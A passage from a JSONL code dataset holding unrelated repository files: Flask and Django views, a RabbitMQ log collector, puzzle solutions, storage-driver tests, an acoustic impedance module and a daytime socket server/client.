print(\"---------------------------------------------\")\n print(e)\n print(\"---------------------------------------------\")\n print(\"---------------------------------------------\")\n return 'ERROR: ' + str(e)\n","repo_name":"julio9246/hg-poker-api","sub_path":"source/helpers/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30670771366","text":"import json\nimport logging\nimport textwrap\n\nimport pika\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nfrom mettle.settings import get_settings\nfrom mettle.models import JobLogLine\nimport mettle_protocol as mp\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\ndef main():\n settings = get_settings()\n\n rabbit_conn = pika.BlockingConnection(pika.URLParameters(settings.rabbit_url))\n rabbit = rabbit_conn.channel()\n mp.declare_exchanges(rabbit)\n queue_name = 'mettle_job_logs'\n rabbit.queue_declare(queue=queue_name, exclusive=False,\n durable=True)\n rabbit.queue_bind(exchange=mp.JOB_LOGS_EXCHANGE,\n 
queue=queue_name, routing_key='#')\n logger.info('Bound exchange %s to queue %s' % (mp.JOB_LOGS_EXCHANGE,\n queue_name))\n\n engine = create_engine(settings.db_url, echo=False)\n Session = sessionmaker(bind=engine)\n for method, properties, body in rabbit.consume(queue=queue_name):\n db = Session()\n data = json.loads(body)\n job_id = data['job_id']\n line_num = data['line_num']\n message = data['msg']\n try:\n db.add(JobLogLine(\n job_id=job_id,\n line_num=line_num,\n message=message,\n ))\n db.commit()\n logger.info(message)\n except IntegrityError:\n # We probably got a duplicate log line, which can happen given\n # Rabbit retries. Query DB for log line matching job_id and\n # line_num. If we have one, and it is the same message, then just\n # carry on. If the message is different, then log an error.\n db.rollback()\n existing_line = db.query(JobLogLine).filter_by(job_id=job_id,\n line_num=line_num).one()\n if existing_line.message != message:\n err = \"\"\"Job {job_id}, log line {num} is stored as\n this:\\n{old}\\n\\n but the queue has just produced a new message\n for the same line, with this value:\\n{new}\"\"\"\n\n\n logger.error(textwrap.dedent(err).format(\n job_id=job_id,\n num=line_num,\n old=existing_line.message,\n new=message,\n ))\n finally:\n db.close()\n engine.dispose()\n \n rabbit.basic_ack(method.delivery_tag)\n\nif __name__ == '__main__':\n main()\n","repo_name":"yougov/mettle","sub_path":"mettle/logcollector.py","file_name":"logcollector.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"26478126608","text":"import os\nfrom django.conf import settings\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import get_object_or_404, redirect, render\nfrom django.views.generic import DetailView\nfrom .forms import PostForm\nfrom .models import Post\n\n\npost_detail = DetailView.as_view(model=Post)\n\n\ndef post_new(request):\n if request.method == 'POST':\n form = PostForm(request.POST, request.FILES)\n if form.is_valid():\n # 방법1)\n '''\n post = Post()\n post.title = form.cleaned_data['title']\n post.content = form.cleaned_data['content']\n post.save()\n '''\n\n # 방법2)\n \"\"\"\n post = Post(title = form.cleaned_data['title'],\n content = form.cleaned_data['content'])\n post.save()\n \"\"\"\n\n # 방법3)\n '''\n Post.objects.create(title = form.cleaned_data['title'],\n content = form.cleaned_data['content'])\n '''\n\n # 방법4)\n '''\n Post.objects.create(**form.cleaned_data)\n '''\n post = form.save(commit=False)\n post.ip = request.META['REMOTE_ADDR']\n post.save()\n return redirect('dojo:post_list')\n else:\n form = PostForm()\n\n return render(request, 'dojo/post_new.html', {\n 'form': form,\n })\n\n\ndef post_edit(request, id):\n post = get_object_or_404(Post, id=id)\n\n if request.method == 'POST':\n form = PostForm(request.POST, request.FILES, instance=post)\n if form.is_valid():\n post = form.save(commit=False)\n post.ip = request.META['REMOTE_ADDR']\n post.save()\n return redirect('dojo:post_list')\n else:\n form = PostForm(instance=post)\n \n return render(request, 'dojo/post_new.html', {\n 'form': form,\n })\n\ndef mysum(request, numbers):\n # numbers = [int(num) for num in numbers.split(\"/\")]\n # result = sum(map(int, numbers.split(\"/\")))\n result = sum(map(lambda s: int(s or 0), numbers.split(\"/\")))\n return HttpResponse(result)\n\n\ndef hello(request, name, age):\n return HttpResponse(\"안녕하세요, {}, {}살 이시네요\".format(name, 
age))\n\n\ndef post_list(request):\n return render(request, 'dojo/layout.html')\n\n\ndef post_list1(request):\n name = \"Ben\"\n return HttpResponse(\"\"\"
Hello {name}\n
welcome to the your World\"\"\".format(name=name)\n )\n\n\ndef post_list2(request):\n name = {\"name\": \"Ben\"}\n response = render(request, \"dojo/post_list2.html\", name)\n return response\n\n\ndef post_list3(request):\n json_response = JsonResponse({\n \"items\": [\"python\", \"django\", \"data\", \"algorithm\"],\n \"message\": \"road to python and django developer\",\n }, json_dumps_params={\"ensure_ascii\": False})\n return json_response\n\n\ndef excel_download(request):\n filepath = os.path.join(settings.BASE_DIR, \"hotfoot-software.xls\")\n filename = os.path.basename(filepath)\n with open(filepath, \"rb\") as f:\n response = HttpResponse(f, content_type='application/vnd.ms-excel') # content_type(MIME type) default = text/html\n response['Content-disposition'] = 'attachment; filename=\"{}\"'.format(filename)\n return response","repo_name":"bufpal/start_django","sub_path":"dojo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4994064827","text":"from collections import defaultdict\nimport re\nimport math\nimport numpy as np\nfrom numpy.core.fromnumeric import sort\nfrom collections import deque\n\nwith open(\"input.dat\", \"r\") as file:\n lines = [list(line.strip()) for line in file.readlines()]\n\nillegal_points = 0\nillPointDict = {')':3, ']':57, '}':1197, '>':25137}\nfor line in lines:\n stack = deque()\n\n for i, bracket in enumerate(line):\n if i == 0:\n stack.append(bracket)\n continue\n\n if len(stack) > 0 and [stack[-1], bracket] in [['{', '}'], ['[', ']'], ['(', ')'], ['<', '>']]:\n stack.pop()\n continue\n \n stack.append(bracket)\n\n if len(stack) > 0:\n for b in stack:\n # find illegal char\n if b in illPointDict.keys():\n illegal_points += illPointDict[b]\n break\n \nprint(illegal_points)\n\n\n# PART2\ndef closeme(bracket):\n if bracket == \"{\": return \"}\"\n if bracket == \"[\": return \"]\"\n if bracket == \"<\": return \">\"\n if bracket == \"(\": return \")\"\n\n\npointslist = []\npointsDict = {')':1, ']':2, '}':3, '>':4}\nfor line in lines:\n\n stack = deque()\n\n for i, bracket in enumerate(line):\n if i == 0:\n stack.append(bracket)\n continue\n\n if len(stack) > 0 and [stack[-1], bracket] in [['{', '}'], ['[', ']'], ['(', ')'], ['<', '>']]:\n stack.pop()\n continue\n \n stack.append(bracket)\n\n isIllegal = False\n if len(stack) > 0:\n for i, b in enumerate(stack):\n if b in pointsDict.keys():\n isIllegal = True\n break\n\n # line is illegal\n if isIllegal: continue\n\n # line is legal\n bstring = [closeme(stack.pop()) for _ in range(len(stack))]\n \n points = 0\n for b in bstring:\n points *= 5\n points += pointsDict[b]\n pointslist.append(points)\n\nprint(int(np.median(pointslist)))","repo_name":"benjaminorthner/adventofcode","sub_path":"2021/10/day10.py","file_name":"day10.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21721437269","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport random\nimport string\nimport StringIO\n\nfrom docker_registry.core import driver\nfrom docker_registry.core import exceptions\nfrom docker_registry import testing\n\nfrom nose import tools\n\nlogger = logging.getLogger(__name__)\n\nGOOD_REMOTE = \"localhost:1025:2\"\nBAD_REMOTE = \"localhost:1100:2-0\"\n\n\nclass TestQuery(testing.Query):\n def __init__(self):\n self.scheme = 'elliptics'\n\n\nclass TestDriver(testing.Driver):\n 
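\"\"\"Conformance tests for the elliptics driver; they assume a local\n    elliptics node reachable at GOOD_REMOTE (docstring added as a note).\"\"\"\n    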
def __init__(self):\n self.scheme = 'elliptics'\n self.path = ''\n self.config = testing.Config({'elliptics_nodes': GOOD_REMOTE})\n\n @tools.raises(exceptions.FileNotFoundError)\n def test_remove_inexistent_path(self):\n filename = self.gen_random_string()\n self._storage.remove(\"/\".join((filename, filename)))\n\n\nclass TestBorderDriverCases(object):\n def __init__(self):\n self.scheme = 'elliptics'\n self.path = ''\n self.config = testing.Config({'elliptics_nodes': GOOD_REMOTE,\n 'elliptics_groups': [999, 1000]})\n\n def gen_random_string(self, length=16):\n return ''.join([random.choice(string.ascii_uppercase + string.digits)\n for x in range(length)]).lower()\n\n def setUp(self):\n storage = driver.fetch(self.scheme)\n self._storage = storage(self.path, self.config)\n\n @tools.raises(exceptions.FileNotFoundError)\n def test_s_remove(self):\n filename = self.gen_random_string()\n self._storage.s_remove(filename)\n\n @tools.raises(exceptions.UnspecifiedError)\n def test_s_write(self):\n filename = self.gen_random_string()\n tag = self.gen_random_string(length=5)\n self._storage.s_write(filename, \"dummycontent\", (tag,))\n\n @tools.raises(exceptions.UnspecifiedError)\n def test_s_append(self):\n filename = self.gen_random_string()\n self._storage.s_append(filename, \"dummycontent\")\n\n\nclass TestWriteStreaming(object):\n def __init__(self):\n self.scheme = 'elliptics'\n self.path = ''\n self.config = testing.Config({'elliptics_nodes': GOOD_REMOTE})\n\n def setUp(self):\n storage = driver.fetch(self.scheme)\n self._storage = storage(self.path, self.config)\n\n def gen_random_string(self, length=16):\n return ''.join([random.choice(string.ascii_uppercase + string.digits)\n for x in range(length)]).lower()\n\n def test_s_stream_write_many_chunks(self):\n # decrease buffer size to\n self._storage.buffer_size = 100\n filename = self.gen_random_string(length=10)\n path = \"/\".join((filename, filename))\n fakedata = self.gen_random_string(length=201)\n fakefile = StringIO.StringIO(fakedata)\n self._storage.stream_write(path, fakefile)\n assert self._storage.get_content(path) == fakedata\n\n\ndef _set_up_with_config(config):\n config = testing.Config(config)\n d = testing.Driver(scheme='elliptics',\n config=config)\n d.setUp()\n return d\n\n\n@tools.raises(exceptions.ConfigError)\ndef test_elliptics_no_nodes_conf():\n _set_up_with_config({})\n\n\n@tools.raises(exceptions.ConfigError)\ndef test_elliptics_wrong_nodes_type_conf():\n _set_up_with_config({'elliptics_nodes': 1111111})\n\n\n@tools.raises(exceptions.ConnectionError)\ndef test_elliptics_bad_nodes_conf():\n _set_up_with_config({'elliptics_nodes': [BAD_REMOTE]})\n\n\n@tools.raises(exceptions.ConfigError)\ndef test_elliptics_zero_groups_conf():\n _set_up_with_config({'elliptics_groups': []})\n\n@tools.raises(exceptions.ConfigError)\ndef test_elliptics_invalid_verbosity_conf():\n groups = [1, 2, 3]\n _set_up_with_config({'elliptics_groups': groups,\n 'elliptics_nodes': GOOD_REMOTE,\n 'elliptics_verbosity': 'blabla'})\n\ndef test_elliptics_groups_conf():\n groups = [1, 2, 3]\n dr = _set_up_with_config({'elliptics_groups': groups,\n 'elliptics_nodes': GOOD_REMOTE})\n assert sorted(dr._storage._session.groups) == sorted(groups)\n\n groups_as_string = \"[1, 2,3]\"\n dr = _set_up_with_config({'elliptics_groups': groups_as_string,\n 'elliptics_nodes': GOOD_REMOTE})\n assert sorted(dr._storage._session.groups) == 
sorted(groups)\n","repo_name":"noxiouz/docker-registry-driver-elliptics","sub_path":"tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4311,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"24660845998","text":"import itertools\nimport functools\n\ndef calculate_ribbon_needed(box):\n dimensions = [int(x) for x in box.split('x')]\n ribbon = sum([2*x for x in sorted(dimensions)[:2]]) + functools.reduce(lambda x,y: x*y, dimensions)\n return ribbon\n\ndef calculate_wrapping_paper_needed(box):\n dimensions = [int(x) for x in box.split('x')]\n combinations = list(itertools.combinations(dimensions, 2))\n raw_packing = [2*x*y for x,y in combinations]\n packing = sum(raw_packing) + min(raw_packing)//2\n return packing\n\nwith open('C:\\\\Users\\\\dider\\\\AppData\\\\Local\\\\Programs\\\\Python\\\\Python39\\\\AoC 2015\\\\input\\\\day2.txt', 'r') as file:\n data = file.read().splitlines()\n print('Part 1: {}'.format(sum([calculate_wrapping_paper_needed(box) for box in data])))\n print('Part 2: {}'.format(sum([calculate_ribbon_needed(box) for box in data])))\n","repo_name":"Diderikdm/Advent-of-Code-2015","sub_path":"day 02 - part 1 & 2.py","file_name":"day 02 - part 1 & 2.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31042281889","text":"from flask import Blueprint, app, render_template, redirect,request, jsonify, make_response, Response\nfrom flask_login import login_required, current_user\nfrom .models import Comments, User, Posts, Likes\nfrom . import db\nimport json\nfrom base64 import b64encode\n\nviews = Blueprint('views', __name__)\n\n@views.route('/home', methods=['GET', 'POST'])\n@login_required\ndef home():\n \n print(current_user)\n if request.method == 'POST':\n post = request.form.get('post')\n post=post.replace(\"[sp]\", \" \")\n post=post.replace(\"[n1]\", \"\\n\")\n print(post)\n\n if len(post)<1:\n return render_template(\"home.html\", user=current_user)\n \n else:\n new_post = Posts(data=post, user_id = current_user.id)\n \n db.session.add(new_post)\n db.session.commit()\n\n\n \n return render_template(\"home.html\", user=current_user)\n\n\n\n@views.route('/feeds', methods= ['GET','POST'])\n@login_required\ndef timeline():\n \n\n posts_liked=[]\n \n for likes in Likes.query.all() :\n if current_user.id == likes.user :\n posts_liked.append(likes.post_id)\n \n return render_template(\"timeline.html\", user=current_user, posts=Posts.query.all(), user_list=User.query.all(), likes= posts_liked)\n\n\n\n@views.route('/remove-post', methods= ['POST'])\ndef remove_post():\n post = json.loads(request.data)\n postId = post['PostId']\n post = Posts.query.get(postId)\n if post:\n if post.user_id == current_user.id:\n db.session.delete(post)\n db.session.commit()\n \n return jsonify({})\n\n\n@views.route('/like-post', methods= ['POST'])\ndef like_post():\n \n like = json.loads(request.data)\n \n postId = like['PostId']\n \n posts=Posts.query.all()\n for post in posts :\n if post.id == postId:\n post.no_of_likes += 1\n \n \n like = Likes(user=current_user.id , post_id= postId)\n \n db.session.add(like)\n db.session.commit()\n \n return jsonify({})\n\n\n@views.route('/dislike-post', methods= ['POST'])\ndef dislike_post():\n \n dislike = json.loads(request.data)\n \n postId = dislike['PostId']\n \n posts=Posts.query.all()\n for post in posts :\n if post.id == postId:\n for like in post.likes :\n 
if(current_user.id == like.user):\n db.session.delete(like)\n post.no_of_likes -= 1\n db.session.commit()\n \n \n\n \n \n return jsonify({})\n\n@views.route('/comment', methods= ['POST'])\ndef comment():\n \n comments = json.loads(request.data)\n \n postId, data = comments['PostId'] , comments['data']\n \n posts=Posts.query.all()\n for post in posts :\n if post.id == postId:\n post.no_of_comments += 1\n \n \n comment = Comments(user=current_user.id , data= data , post_id= postId)\n \n db.session.add(comment)\n db.session.commit()\n \n return jsonify({})\n\n\n@views.route('/remove-comment', methods= ['POST'])\ndef remove_comment():\n \n comment = json.loads(request.data)\n \n postId = comment['PostId']\n \n posts=Posts.query.all()\n for post in posts :\n if post.id == postId:\n for comment in post.comments :\n if(current_user.id == comment.user):\n db.session.delete(comment)\n post.no_of_comments -= 1\n db.session.commit()\n \n \n\n \n \n return jsonify({})\n\n@views.route('/profilepic/')\ndef profilepic(id):\n event = User.query.filter_by(id=id).first()\n print(\"hey\")\n image=b64encode(event.profile_pic)\n return (image)","repo_name":"RishiKr3101/Edugo","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31539245939","text":"# LL: 〇〇法が思いついても、シンプルなやり方がないか考えてみる\n# DAG判定\n# トポロジカルソート\n\nimport sys\n\nsys.setrecursionlimit(200000)\n\n\n# 1-based\ndef is_DAG(G):\n def has_cycle(v):\n if cache[v] is not None:\n return cache[v]\n\n if visited[v]:\n return True\n\n visited[v] = True\n\n result = False\n for next_v in G[v]:\n if has_cycle(next_v):\n result = True\n break\n\n cache[v] = result\n return result\n\n N = len(G) - 1\n visited = [None] + [False] * N\n cache = [None] + [None] * N\n\n for v in range(1, N + 1):\n if has_cycle(v):\n return False\n return True\n\n\n# 1-based, return None if G is notDAG\ndef topological_sort(G):\n def rec(v):\n visited[v] = True\n for next_v in G[v]:\n if visited[next_v]:\n continue\n rec(next_v)\n order.append(v)\n\n if not is_DAG(G):\n return None\n\n N = len(G) - 1\n visited = [None] + [False] * N\n\n order = []\n for v in range(1, N + 1):\n if visited[v]:\n continue\n rec(v)\n\n return list(reversed(order))\n\n\ndef who_is_saikyo_mine(N, M, G):\n if len([g for g in G[1:] if len(g) == 0]) != 1:\n return -1\n\n t = topological_sort(G)\n if t is None:\n return -1\n return t[-1]\n\n\ndef who_is_saikyo_editorial(N, M, G):\n strongest = [None] + [1] * N\n\n for weaker in G[1:]:\n strongest[weaker] = 0\n\n if sum(strongest) != 1:\n return -1\n\n return strongest.index(1)\n\n\ndef resolve_mine():\n N, M = [int(e) for e in sys.stdin.readline().split()]\n G = [None] + [[] for _ in range(N)]\n for _ in range(M):\n a, b = [int(e) for e in sys.stdin.readline().split()]\n G[b].append(a)\n print(who_is_saikyo_mine(N, M, G))\n\n\ndef resolve():\n N, M = [int(e) for e in sys.stdin.readline().split()]\n strongest = [None] + [1] * N\n\n for _ in range(M):\n stronger, weaker = [int(e) for e in sys.stdin.readline().split()]\n strongest[weaker] = 0\n\n if sum(strongest[1:]) != 1:\n print(-1)\n else:\n print(strongest.index(1))\n\n\n# resolve()\n# exit()\n\nimport sys\nfrom io import StringIO\nimport unittest\n\n\nclass TestClass(unittest.TestCase):\n def assertIO(self, input, output):\n stdout, stdin = sys.stdout, sys.stdin\n sys.stdout, sys.stdin = StringIO(), StringIO(input)\n resolve()\n sys.stdout.seek(0)\n out = 
sys.stdout.read()[:-1]\n sys.stdout, sys.stdin = stdout, stdin\n self.assertEqual(out, output)\n\n def test_1(self):\n input = \"\"\"3 3\n1 2\n2 3\n3 1\"\"\"\n output = \"\"\"-1\"\"\"\n self.assertIO(input, output)\n\n def test_入力例_1(self):\n input = \"\"\"3 2\n1 2\n2 3\"\"\"\n output = \"\"\"1\"\"\"\n self.assertIO(input, output)\n\n def test_入力例_2(self):\n input = \"\"\"3 2\n1 3\n2 3\"\"\"\n output = \"\"\"-1\"\"\"\n self.assertIO(input, output)\n\n def test_入力例_3(self):\n input = \"\"\"6 6\n1 6\n6 5\n6 2\n2 3\n4 3\n4 2\"\"\"\n output = \"\"\"-1\"\"\"\n self.assertIO(input, output)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"koba925/alds","sub_path":"atcoder/ABC313/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37807696265","text":"import pylab as pl\nimport numpy as np\nimport string\nfrom . import PeakFinder as pk\nimport os\n\n\nclass Impedance(object):\n \"\"\"\n Impedance object containing impedance at a set of frequencies\n \"\"\"\n \n def __init__(self, freq=None, imped=None):\n if imped is not None:\n self.imped = imped\n else:\n self.imped = np.array([])\n\n if freq is not None:\n assert len(freq) == len(self.imped), \\\n \"Frequency (%s) and impedance (%s) are not same size\" % (\n freq.shape, self.imped.shape)\n self.freq = freq\n else:\n self.freq = np.linspace(0,0.5,len(self.imped))\n\n def set_name(self,name):\n self.name=name\n \n def get_name(self):\n return self.name\n \n def add_suffix_to_name(self, suf='Corr'):\n cur = self.get_name()\n sufst = str.find(cur,'-'+suf)\n if self.dernum > 0:\n basename = cur[0:sufst]\n remaining = cur[sufst+len(suf)+2:]\n n = self.dernum\n newname = (cur[0:sufst] + '-%s-%d')%(suf, n)\n else:\n newname = (cur + '-%s')%(suf)\n \n self.dernum += 1\n self.set_name(newname)\n \n def GuessNominalFreqFromFileName(self):\n '''tries to guess note frequency from the file name\n '''\n \n import aubio\n import re\n \n tokens=re.findall('([A-Ga-g][sS#bB+-]*\\d+)',self.name)\n \n try:\n notename=re.sub('s','#',tokens[0])\n f=aubio.miditofreq(aubio.note2midi(notename))\n except (ValueError,IndexError):\n f=np.NaN\n \n return f\n \n def copy(self):\n '''Create a new object with the same values as this one'''\n import copy\n \n return copy.deepcopy(self)\n \n def correctImpedance(self, g=lambda x,y : x):\n ''' Apply a function g to correct the measured impedance\n the format of g is g(Zi,f), where Zi is the measured impedance\n and f the frequency'''\n \n newimp = self.copy()\n \n zraw = self.getImpedance()\n f = self.getFrequencyVect()\n \n newimp.z = g(zraw,f)\n newimp.add_suffix_to_name(suf='Corr')\n \n return newimp\n \n def addParallelMouthpiece(self, vol = 3.5e-7, mass = 4500.0, res = 0.0):\n ''' Calculate the \"Impedance seen by the mouthpiece flow\", \n given the reed parameters:\n * vol: equivalent volume of the reed (acoustic) \n * mass: equivalent acoustic mass of the reed\n * res: equivalent acoustic resistance\n '''\n \n # reed equivalent volume\n eqvol = vol\n gamma=1.4\n p0=1.013e5\n eqc = eqvol / ( gamma * p0 )\n # reed equivalent resistance\n eqr = res\n # reed acoustic mass\n eqm = mass\n \n # reed impedance\n zreed = lambda ff: 1./(1j*2.*np.pi*ff*eqc) + eqr + 1j*2.*np.pi*ff*eqm\n g = lambda zi,ff: 1./zi + 1./zreed(ff)\n \n newimp = self.correctImpedance()\n \n return newimp.getImpedance()\n \n def getImpedance(self):\n return self.imped.squeeze()\n\n def getFrequencyVect(self):\n return 
self.freq\n\n \n def findPeaks(self):\n '''Finds the frequencies and values of impedance maxima\n '''\n \n f = self.freq\n pf=pk.PeakFinder(abs(self.imped))\n pf.refine_all(rad=3,logarithmic=True)\n pf.filter_by_salience(rad=5)\n \n fpk = np.interp(pf.get_pos(),np.arange(len(f)),f)\n zpk = np.interp(pf.get_pos(),np.arange(len(f)),abs(self.imped.squeeze()))\n\n return fpk,zpk, pf.get_q()\n\n def findZeroPh(self, direction=-1):\n '''Finds the frequencies at which the phase is 0\n * default, find zero crossings with negative slope\n * direction=+1 finds those with positive slope\n '''\n \n f = self.getFrequencyVect()\n z = self.getImpedance()\n za = np.angle(z)*direction\n \n zci=np.nonzero(np.all((za[:-1]<0.,za[1:]>0.),axis=0))\n azcf = []\n for ii in zci:\n azcf.append((f[ii]-(f[ii+1]-f[ii])/(za[ii+1]-za[ii])*za[ii]))\n \n zcf = np.array(azcf).squeeze()\n\n return zcf,np.interp(zcf,f,np.abs(z))\n\n \n def findPeaksCorrected(self, vol = 3.5e-7, mass = 4500.0, res = 0.0):\n import PeakFinder as pk\n \n f = self.f\n z = self.addParallelMouthpiece(vol=vol,mass=mass,res=res)\n pf=pk.PeakFinder(abs(z))\n pf.refine_all(rad=3,logarithmic=True)\n pf.filter_by_salience(rad=5)\n \n fpk = np.interp(pf.get_pos(),np.arange(len(f)),f)\n zpk = np.interp(pf.get_pos(),np.arange(len(f)),abs(z))\n\n return fpk,zpk\n \n def estimate_modal_expansion(self, **kwargs):\n \"\"\"\n Perform the estimation of a modal expansion of the loaded data.\n \n (part of Moreesc by F. Silva:\n http://moreesc.lma.cnrs-mrs.fr/)\n\n Parameters\n ==========\n algorithm : str 'Kennelly' or 'bruteforce'\n Algorithm used to compute the modal expansion.\n kwargs : passed to computational routines.\n \"\"\"\n kwargs['output_snCn'] = True\n method = kwargs.pop('algorithm', 'Kennelly')\n from . import ModalExpansionEstimation as mod\n\n freq, valZ = self.frequencies, self.values\n fmin = kwargs.pop('fmin', self.frequencies[0])\n fmax = kwargs.pop('fmax', self.frequencies[-1])\n mask_opt = np.logical_and(freq > fmin, freq < fmax)\n freq, valZ = freq[mask_opt], valZ[mask_opt]\n\n if method.lower() == 'kennelly':\n tmp = mod.multiple_circles(freq, valZ, **kwargs)\n print(\"Kennelly fitting is over, please check the result!\")\n self.poles, self.residues = tmp\n elif method.lower() == 'bruteforce':\n flag, tmp = mod.bruteforce_optimization(freq, valZ, **kwargs)\n if flag:\n print('Modal expansion estimation seems successful.')\n self.poles, self.residues = tmp\n else:\n print('Modal expansion estimation not successful...')\n self.poles, self.residues = np.array([]), np.array([])\n else:\n raise NotImplementedError('Algorithm %s does not exist.' 
% method)\n\n # Remove active modes\n idx = (self.poles.real <= 0.)\n self.poles = self.poles[idx]\n self.residues = self.residues[idx]\n self.nbmodes = len(self.poles)\n\n def plotAbsAngle(self,fig=None):\n if fig is None:\n fig=pl.figure()\n else:\n if type(fig) is int:\n fig = pl.figure(fig)\n else:\n fig=pl.figure(fig.number)\n ax1=pl.subplot(211)\n pl.hold(True)\n pl.plot(self.f,20*np.log10(np.abs(self.z)),label=self.name)\n pl.xlabel('Frequency (Hz)')\n pl.ylabel('Module (dB)')\n \n pl.subplot(212,sharex=ax1)\n pl.hold(True)\n pl.plot(self.f,(np.angle(self.z)),label=self.name)\n pl.xlabel('Frequency (Hz)')\n pl.ylabel('Argument (rad)')\n \n pl.legend()\n \n return fig\n\n","repo_name":"goiosunsw/ImpedancePython","sub_path":"pympedance/_impedance.py","file_name":"_impedance.py","file_ext":"py","file_size_in_byte":7265,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"14753183262","text":"#!/usr/bin/env python3\n\nimport argparse\nimport fcntl\nimport ipaddress\nimport signal\nimport socket\nimport struct\nimport sys\nimport time\n\nSIOCGIFADDR = 0x8915\nSIOCGIFADDR_SLICE = (20, 24)\n\nparser = argparse.ArgumentParser(\n description='Daytime Server&Client, by IPv4&IPv6, TCP&UDP.',\n usage='%(prog)s [-h] [-cs] [-46] [-UT] [-p PORT]'\n ' [-i INTERFACE] [-t TIMEOUT] ADDRESS')\nparser.add_argument('-c',\n action='store_const',\n dest='mode',\n const='client',\n help='Mode: Client')\nparser.add_argument('-s',\n action='store_const',\n dest='mode',\n const='server',\n help='Mode: Server')\nparser.add_argument('-4',\n action='store_const',\n dest='family',\n const=socket.AF_INET,\n help='Family: IPv4')\nparser.add_argument('-6',\n action='store_const',\n dest='family',\n const=socket.AF_INET6,\n help='Family: IPv6')\nparser.add_argument('-U',\n action='store_const',\n dest='socktype',\n const=socket.SOCK_DGRAM,\n help='Type: UDP')\nparser.add_argument('-T',\n action='store_const',\n dest='socktype',\n const=socket.SOCK_STREAM,\n help='Type: TCP')\nparser.add_argument('-p', '--port', default='13', help='TCP|UDP Port')\nparser.add_argument('-i', '--interface', help='Interface')\nparser.add_argument('-t',\n '--timeout',\n type=int,\n default=1,\n help='UDP Client Timeout')\nparser.add_argument('address', help='IP Address')\nargs = parser.parse_args()\n\nmode = args.mode or 'server'\nfamily = args.family or socket.AF_INET\nsocktype = args.socktype or socket.SOCK_DGRAM\nep = socket.getaddrinfo(args.address, args.port, family=family,\n type=socktype)[0][-1]\ninterface = args.interface\ntimeout = args.timeout\n\n\ndef client():\n sockfd = socket.socket(family, socktype)\n if interface:\n sockfd.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE,\n interface.encode())\n if socktype == socket.SOCK_STREAM:\n sockfd.connect(ep)\n sys.stdout.buffer.write(sockfd.recv(4096))\n elif socktype == socket.SOCK_DGRAM:\n if family == socket.AF_INET and ep[0] == '255.255.255.255':\n sockfd.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\n sockfd.sendto(b'\\x00', ep)\n if timeout > 0:\n signal.signal(signal.SIGALRM, lambda _no, _f: sys.exit(0))\n signal.alarm(timeout)\n while True:\n buf, servep = sockfd.recvfrom(4096)\n sys.stdout.buffer.write(\n f'recvfrom {servep[0]}, port {servep[1]}: '.encode())\n sys.stdout.buffer.write(buf)\n sys.stdout.flush()\n sockfd.close()\n\n\ndef server():\n sockfd = socket.socket(family, socktype)\n servep = ep\n if family == socket.AF_INET:\n if ipaddress.IPv4Address(ep[0]).is_multicast:\n ifaddr = 
b'\\x00\\x00\\x00\\x00'\n if interface:\n ifaddr = fcntl.ioctl(\n sockfd, SIOCGIFADDR,\n struct.pack('64s',\n interface.encode()))[SIOCGIFADDR_SLICE[0],\n SIOCGIFADDR_SLICE[1]]\n sockfd.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP,\n socket.inet_pton(socket.AF_INET, ep[0]) + ifaddr)\n servep = ('', ep[1])\n elif family == socket.AF_INET6:\n if ipaddress.IPv6Address(ep[0]).is_multicast:\n ifindex = 0\n if interface:\n ifindex = socket.if_nametoindex(interface)\n sockfd.setsockopt(\n socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP,\n socket.inet_pton(socket.AF_INET6, ep[0]) +\n struct.pack('@i', ifindex))\n servep = ('', ep[1])\n sockfd.bind(servep)\n if socktype == socket.SOCK_STREAM:\n sockfd.listen()\n signal.signal(signal.SIGINT, lambda _no, _f: sys.exit(0))\n while True:\n if socktype == socket.SOCK_STREAM:\n clifd, cliep = sockfd.accept()\n print(f'accept {cliep[0]}, port {cliep[1]}')\n clifd.send(f'{time.ctime()}\\r\\n'.encode())\n clifd.close()\n elif socktype == socket.SOCK_DGRAM:\n _, cliep = sockfd.recvfrom(4096)\n print(f'recvfrom {cliep[0]}, port {cliep[1]}')\n sockfd.sendto(f'{time.ctime()}\\n'.encode(), cliep)\n\n\nif mode == 'client':\n client()\nelif mode == 'server':\n server()\n","repo_name":"vhqr0/zzuexp","sub_path":"unp/serv.py","file_name":"serv.py","file_ext":"py","file_size_in_byte":4847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30257070891","text":"__all__ = [\"download_job\"]\r\n\r\nimport asyncio\r\nimport aiohttp\r\nimport pandas as pd\r\nimport io\r\nfrom typing import List, Dict, Any\r\n\r\n\r\ndef get_timestamp_today():\r\n\r\n 